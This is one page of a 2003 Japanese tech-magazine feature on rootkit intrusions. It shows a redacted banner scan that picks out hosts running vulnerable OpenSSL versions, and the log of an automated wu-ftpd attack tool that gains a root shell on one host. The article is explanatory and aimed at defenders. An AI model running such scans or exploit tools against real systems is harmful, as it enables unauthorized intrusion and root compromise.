エンタープライズ:特集 2003/03/28 17:09:00 更新

rootkitによるハッキングとその防御
第4回 rootkitを利用した侵入 (3/5)

特定のセキュリティホールのあるサービスが動いているコンピュータのみをスキャンする

 では、いくつかの例を挙げてみよう。まず、既知のセキュリティホールのあるサービスが動作しているコンピュータをスキャンした例だ。

 下記のログは、「OpenSSLの古いセキュリティホールがあるバージョンが動作しているコンピュータ」を抽出するために、インターネット上で誰でも手に入れることができるスキャンニングツールを用い、ある範囲のネットワークのスキャンを行ったものの一部である。IPアドレス自体は伏せ字を入れたものに変更してあるが、このログは実際に今年の初めにスキャンされたものだ。クラッカーがこのようなログを元にコンピュータを選別していけば、余計な手間をかけずに侵入できてしまう。

■脆弱性のあるサービスが動作しているかスキャンされたログ
Session starts: Wed Jan 15 08:45:10 2003
Scanning from xx.0.0.1, port 443, timeout 10s, sockets 1000
xx.xx.32.2: server: apache/1.3.23 (unix) mod_ssl/2.8.7 openssl/0.9.6c php/4.2.2
xx.xx.32.10: server: apache/1.3.26 (unix) php/4.2.2 mod_ssl/2.8.10 openssl/0.9.6g
xx.xx.32.14: server: apache/1.3.26 (unix) php/4.2.2 mod_ssl/2.8.10 openssl/0.9.6g
xx.xx.32.26: server: apache/1.3.20 (linux/suse) mod_ssl/2.8.4 openssl/0.9.6b php/4.0.6
xx.xx.32.27: server: microsoft-iis/5.0
xx.xx.32.31: server: apache/1.3.26 (unix) php/4.2.2 mod_ssl/2.8.10 openssl/0.9.6d
xx.xx.32.34: server: apache/1.3.26 (unix) php/4.2.2 mod_ssl/2.8.10 openssl/0.9.6d
xx.xx.32.20: server: apache/1.3.26 (unix) php/4.2.2 mod_ssl/2.8.10 openssl/0.9.6g
xx.xx.32.24: server: apache/1.3.23 (unix) mod_ssl/2.8.7 openssl/0.9.6c php/4.2.2
xx.xx.32.36: server: microsoft-iis/5.0
xx.xx.32.40: server: apache/1.3.26 (unix) php/4.2.2 mod_ssl/2.8.10 openssl/0.9.6d
xx.xx.32.43: server: apache/1.3.26 (linux/suse) mod_ssl/2.8.10 openssl/0.9.6g php/4.2.2
xx.xx.32.37: server: apache/1.3.23 (unix) mod_ssl/2.8.7 openssl/0.9.6c php/4.2.2
xx.xx.32.136: server: apache/1.3.26 (unix) php/4.2.2 mod_ssl/2.8.10 openssl/0.9.6d
xx.xx.35.10: server: apache/1.3.19 (unix) (suse/linux) mod_ssl/2.8.3 openssl/0.9.6a php/4.0.6
xx.xx.32.169: *** connect timeout
xx.xx.64.42: *** connect error: Connection refused
xx.xx.65.2: server: microsoft-iis/5.0
xx.xx.65.14: server: microsoft-iis/5.0
xx.xx.65.11: server: microsoft-iis/4.0
xx.xx.65.12: server: lotus-domino/5.0.6
xx.xx.65.34: *** connect error: Connection refused
xx.xx.65.33: server: apache/1.3.26 (unix) debian gnu/linux php/4.2.2
xx.xx.65.5: server: microsoft-iis/5.0
xx.xx.68.43: server: microsoft-iis/5.0
xx.xx.66.35: server: apache/1.3.20 (unix) (red-hat/linux) mod_ssl/2.8.4 openssl/0.9.6b dav/1.0.2 php/4.0.6 mod_perl/1.24_01
〜省略〜

特定のセキュリティホールのあるサービスが動いているコンピュータのみをスキャンし、ターゲットととなるコンピュータがあれば自動的にアタックさせる

 次に、wu-ftpdへのアタック自体を自動的に行わせるツールを使った場合のログも見てみよう。下記は一部修正しているが、「./r00t」のあとに指定したネットワークの範囲で、自動的にアタックできるツールを使っている。ログの流れを見ると、はじめにアタックしている「192.168.1.12」および「192.168.1.14」のコンピュータでは、今回のアタック対象ではないFTPサーバが動作していたため侵入に失敗している。しかし次の「192.168.1.15」のコンピュータでは、対象となる脆弱性のあるFTPサーバが運営されていたため、アタックに成功し、root権限での侵入に成功している。

■指定した範囲のネットワークで自動的にアタックする
# ./r00t 192 168.
[Ftpd classa]: Acum incercam sa vedem daca puteam roota. right on
[Ftpd classa]: class a  wu-ftpd scaner de daddy_cad
[Ftpd classa]: Pentru fiecare rutare va fi un timp de maxim 10secunde..
My master is daddy_cad:daddy@prietenii.com
Greeting to :RHC Team ( Hacking Team http://rohackers.info) !
Lets try to r3wt the 192.168.1.12 ←このコンピュータでは脆弱性のあるFTPサーバは起動していない
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!
# trying to log into 192.168.1.12 with (ftp/mozilla@) ... connected.
# banner: 220 ProFTPD 1.2.1 Server (ProFTPD Basic Configuration) [linux]
# failed to jield target from banner, aborting
We continue to shit ...
Lets try to r3wt the 192.168.1.14 ←このコンピュータでは脆弱性のあるFTPサーバは起動していない
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!
# trying to log into 192.168.1.14 with (ftp/mozilla@) ...
failed to connect (user/pass correct?)
We continue to shit ...
Lets try to r3wt the 192.168.1.15 ←このコンピュータでは脆弱性のあるFTPサーバが起動している
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!
# trying to log into 192.168.1.15 with (ftp/mozilla@) ... connected.
# banner: 220 linux2 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner
### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
        building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
############################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 19:37:14 EDT 2001 i686 unknown
ls
bin
etc
lib
pub
〜省略〜

前のページ | 1 2 3 4 5 | 次のページ

[TTS,ITmedia]



Special

- PR -

Special

- PR -